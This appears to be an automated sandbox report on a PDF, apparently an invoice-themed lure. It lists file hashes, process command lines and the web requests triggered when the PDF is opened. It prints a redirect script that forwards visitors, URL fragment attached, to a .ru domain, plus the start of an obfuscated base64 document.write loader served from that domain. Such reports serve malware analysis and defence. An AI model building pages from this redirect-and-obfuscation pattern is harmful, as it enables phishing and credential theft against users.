        Preview:SessionID=17865c13-6a72-46cc-81c4-f415d9651206.1736275732914 Timestamp=2025-01-07T13:48:52:914-0500 ThreadID=1700 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=17865c13-6a72-46cc-81c4-f415d9651206.1736275732914 Timestamp=2025-01-07T13:48:52:915-0500 ThreadID=1700 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=17865c13-6a72-46cc-81c4-f415d9651206.1736275732914 Timestamp=2025-01-07T13:48:52:915-0500 ThreadID=1700 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=17865c13-6a72-46cc-81c4-f415d9651206.1736275732914 Timestamp=2025-01-07T13:48:52:915-0500 ThreadID=1700 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=17865c13-6a72-46cc-81c4-f415d9651206.1736275732914 Timestamp=2025-01-07T13:48:52:916-0500 ThreadID=1700 Component=ngl-lib_NglAppLib Description="SetConf
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):29752
        Entropy (8bit):5.388414024348387
        Encrypted:false
        SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r8:g
        MD5:FD9726C6481915149ADB121E3A94812A
        SHA1:BE7CB9CCEC27C54A4BBE671DF237F96B7BFB7DA7
        SHA-256:48943EB92F60BE6984F8BDBF1E4653A7C0C6215CCB5FBAA4B53742BE19B2FA70
        SHA-512:1AB9491DE35B1E80547F0190DDAED07705C55E0CAE20E540DCD2FC4ACEF6AC89D111E58E21553684EFC3D0EEB117EC7AFDCEB2DF12CF5E148DC7A6882420F6D3
        Malicious:false
        Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
        Category:dropped
        Size (bytes):1419751
        Entropy (8bit):7.976496077007677
        Encrypted:false
        SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
        MD5:18E3D04537AF72FDBEB3760B2D10C80E
        SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
        SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
        SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
        Malicious:false
        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
        Category:dropped
        Size (bytes):758601
        Entropy (8bit):7.98639316555857
        Encrypted:false
        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
        MD5:3A49135134665364308390AC398006F1
        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
        Malicious:false
        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
        Category:dropped
        Size (bytes):386528
        Entropy (8bit):7.9736851559892425
        Encrypted:false
        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
        MD5:5C48B0AD2FEF800949466AE872E1F1E2
        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
        Malicious:false
        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
        Category:dropped
        Size (bytes):1407294
        Entropy (8bit):7.97605879016224
        Encrypted:false
        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
        Malicious:false
        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:data
        Category:dropped
        Size (bytes):98682
        Entropy (8bit):6.445287254681573
        Encrypted:false
        SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
        MD5:7113425405A05E110DC458BBF93F608A
        SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
        SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
        SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
        Malicious:false
        Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:data
        Category:dropped
        Size (bytes):737
        Entropy (8bit):7.501268097735403
        Encrypted:false
        SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
        MD5:5274D23C3AB7C3D5A4F3F86D4249A545
        SHA1:8A3778F5083169B281B610F2036E79AEA3020192
        SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
        SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
        Malicious:false
        Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text
        Category:downloaded
        Size (bytes):653
        Entropy (8bit):4.612744991974858
        Encrypted:false
        SSDEEP:12:hYky7ZqJmrCi7Cl4DiSlJXtyoBgxLGxJ4NbbL:hYkCyXMlJXcp2J4NT
        MD5:B10A4071D94986D2879A752403C91D46
        SHA1:D6BD2F5B4CF8175ADFC2F9300077058C158181E7
        SHA-256:A97B253C3BC76DB29EF480C6EC2C463873EE304D989F9668F31528EFF6283873
        SHA-512:5D6304FF3C20517A4CAEFB0467A85D50849A3B53C426D9EE69868C8519B090EE06CBDA88D0E49552D1581E711DB5E3F2250282191449C36FCFC1E0961A9AEF9B
        Malicious:false
        URL:https://deql66fwe8583.z13.web.core.windows.net/
        Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Redirect </title>. <script type="text/javascript">. window.onload = function() {. // Get the fragment (the part after the #) from the current URL. var currentFragment = window.location.hash;.. // Base URL to redirect to. var newBaseUrl = "https://kilivo.trilivarnor.ru/NiKU3ISg/";.. // Redirect to the new URL with the fragment. window.location.href = newBaseUrl + currentFragment;. };. </script>.</head>..</html>.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65447)
        Category:dropped
        Size (bytes):89501
        Entropy (8bit):5.289893677458563
        Encrypted:false
        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
        Malicious:false
        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with no line terminators
        Category:downloaded
        Size (bytes):16
        Entropy (8bit):3.5
        Encrypted:false
        SSDEEP:3:H+rYn:D
        MD5:F1C9C44E663E7E62582E3F5B236C1C72
        SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
        SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
        SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
        Malicious:false
        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmNEUsjCRtiZRIFDTcwqTA=?alt=proto
        Preview:CgkKBw03MKkwGgA=
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65447)
        Category:downloaded
        Size (bytes):89501
        Entropy (8bit):5.289893677458563
        Encrypted:false
        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
        Malicious:false
        URL:https://code.jquery.com/jquery-3.6.0.min.js
        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with very long lines (65448), with CRLF line terminators
        Category:downloaded
        Size (bytes):445068
        Entropy (8bit):3.3087674025469336
        Encrypted:false
        SSDEEP:768:nktYmG/kw9haq8FCtK7+ktktYmG/kw9haq8FCtK7+kSlrElrG:nIYR/kw9hsIoIYR/kw9hsIhSY
        MD5:4AC718B2F478C48A8E73C013C009CB80
        SHA1:A401E92AFAC1958FF9F089DC6B0630419207F295
        SHA-256:683328FAF9AAB6419AC884357B6BE5A7E750BC265060EBF66B36C19AB8FE6708
        SHA-512:15872C38B7BBDC953F7E0ECCD6A0A9A314E1E65E538066F7DCC5A8966F42E302B0060C03F2D57712894BC41E987682AEC8226ADE4E7AA32D374708597E58D32E
        Malicious:false
        URL:https://kilivo.trilivarnor.ru/NiKU3ISg/
        Preview:<script>....if(atob("aHR0cHM6Ly82Zy50cmlsaXZhcm5vci5ydS9OaUtVM0lTZy8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQogICAgdG9wOiAwOw0KICAgIGxlZnQ6IDA7DQogICAgcmlnaHQ6IDA7DQogICAgYm90d
        File type:PDF document, version 1.4, 1 pages
        Entropy (8bit):7.528413401622079
        TrID:
        • Adobe Portable Document Format (5005/1) 100.00%
        File name:01-06-2025 Docu.invpd (1).pdf
        File size:22'584 bytes
        MD5:315bd39e7cd776a32764aba224148061
        SHA1:3fed7458afea256b487d08da66aca463c1b7c9ed
        SHA256:5cc28fdb5a96a7ccfb707273f18427049999e836ce365ca2612380740725ed42
        SHA512:2b4f0b3216f704ebd244388c734afbc515f6fdb938a78a3f74fdb4eb1af3a1eeee04153afa424e224508c54f1c60c1f1c204cbd0abd1e6cec0bb3985655b8984
        SSDEEP:384:qlzjGd6idMLHMLAMLeMcMojMOMCMqEPM1JE1M91MdMQM0FMzMqVMNMKMCd5zkGSk:qlzjGd6id8H8A8eFzjPNDEPuJE1Cg5Hf
        TLSH:94A23A64F98A9C9CECC2CA0BC6B93889491DF64F6ACC68C901294F15F405EDA7B53297
        File Content Preview:%PDF-1.4.%.....1 0 obj.<</Creator (Chromium)./Producer (Skia/PDF m128)./CreationDate (D:20250106181924+00'00')./ModDate (D:20250106181924+00'00')>>.endobj.3 0 obj.<</ca 1./BM /Normal>>.endobj.4 0 obj.<</CA 1./ca 1./LC 0./LJ 0./LW 1./ML 4./SA true./BM /Nor
        Icon Hash:62cc8caeb29e8ae0

        General

        Header:%PDF-1.4
        Total Entropy:7.528413
        Total Bytes:22584
        Stream Entropy:7.983902
        Stream Bytes:14874
        Entropy outside Streams:5.061638
        Bytes outside Streams:7710
        Number of EOF found:1
        Bytes after EOF:
        NameCount
        obj48
        endobj48
        stream5
        endstream5
        xref1
        trailer1
        startxref1
        /Page1
        /Encrypt0
        /ObjStm0
        /URI2
        /JS0
        /JavaScript0
        /AA0
        /OpenAction0
        /AcroForm0
        /JBIG2Decode0
        /RichMedia0
        /Launch0
        /EmbeddedFile0
        No network behavior found

        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:13:48:49
        Start date:07/01/2025
        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\01-06-2025 Docu.invpd (1).pdf"
        Imagebase:0x7ff6bc1b0000
        File size:5'641'176 bytes
        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:1
        Start time:13:48:50
        Start date:07/01/2025
        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
        Imagebase:0x7ff74bb60000
        File size:3'581'912 bytes
        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:3
        Start time:13:48:50
        Start date:07/01/2025
        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1580,i,5074300212230289565,10346747245355225943,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Imagebase:0x7ff74bb60000
        File size:3'581'912 bytes
        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:9
        Start time:13:49:14
        Start date:07/01/2025
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://tcplfmx6.r.us-east-2.awstrack.me/L0/https:%2F%2Fdeql66fwe8583.z13.web.core.windows.net%2F/1/010f01943cd1ecb9-bbe42af5-9aa1-4675-a42c-033d8cddf4b3-000000/z4OrKIJY-F2WkXOVH8jddVKadpM=192"
        Imagebase:0x7ff76e190000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:10
        Start time:13:49:16
        Start date:07/01/2025
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1940,i,2983708879134321863,15791662296439638055,262144 /prefetch:8
        Imagebase:0x7ff76e190000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        No disassembly